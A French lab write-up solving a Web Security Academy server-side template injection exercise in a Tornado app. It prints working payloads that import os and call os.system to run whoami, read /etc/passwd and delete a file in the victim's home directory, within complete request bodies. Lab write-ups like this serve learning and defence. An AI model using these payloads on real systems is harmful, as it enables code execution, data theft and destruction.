SSTI basique en contexte de code (Python )

Basic server-side template injection (code context)

Lab: Basic server-side template injection (code context) | Web Security AcademyWebSecAcademy

Ce laboratoire présente une vulnérabilité Server-Side Template Injection (SSTI) due à l'utilisation non sécurisée d’un template Tornado. L’objectif est d’exécuter du code arbitraire via le moteur de templates, puis de supprimer le fichier morale.txt situé dans le répertoire personnel de Carlos.

Un compte de test est fourni : wiener : peter.

Analyse de l’application

Dans la section permettant de définir la manière dont l’utilisateur souhaite être affiché lors d’un commentaire, il est possible de modifier le paramètre transmis :

L’erreur retournée par le serveur confirme la présence d’un moteur Python/Tornado, ce qui laisse supposer une injection de template.

blog-post-author-display=user.JAAJAJAJ&csrf=mrMPde6YeaY1AVSQZizKC9IKWI3VFNoj

PayloadsAllTheThings/Server Side Template Injection/Python.md at master · swisskyrepo/PayloadsAllTheThingsGitHub

Tests d'injection basique

Pour vérifier si le template est interprété :

{{7*7}}
}}{{7*7

Le rendu confirme l’injection : le calcul est exécuté par le moteur de template.

Exécution de commandes

Tornado permet l’import de modules directement dans le template

{{os.system('whoami')}}
{%import os%}{{os.system('whoami')}}

Lecture du fichier `/etc/passwd`

Injection adaptée au paramètre vulnérable

blog-post-author-display=user.name}}{%import os%}{{os.system('cat /etc/passwd')}&csrf=mrMPde6YeaY1AVSQZizKC9IKWI3VFNoj

Suppression du fichier morale.txt

Commande finale pour valider le laboratoire :

blog-post-author-display=user.name}}{%import os%}{{os.system('rm /home/carlos/morale.txt')}&csrf=mrMPde6YeaY1AVSQZizKC9IKWI3VFNoj

Mis à jour il y a 2 mois

hashtagBasic server-side template injection (code context)

hashtagAnalyse de l’application

hashtagTests d'injection basique

hashtagExécution de commandes

hashtagLecture du fichier /etc/passwd

hashtagSuppression du fichier morale.txt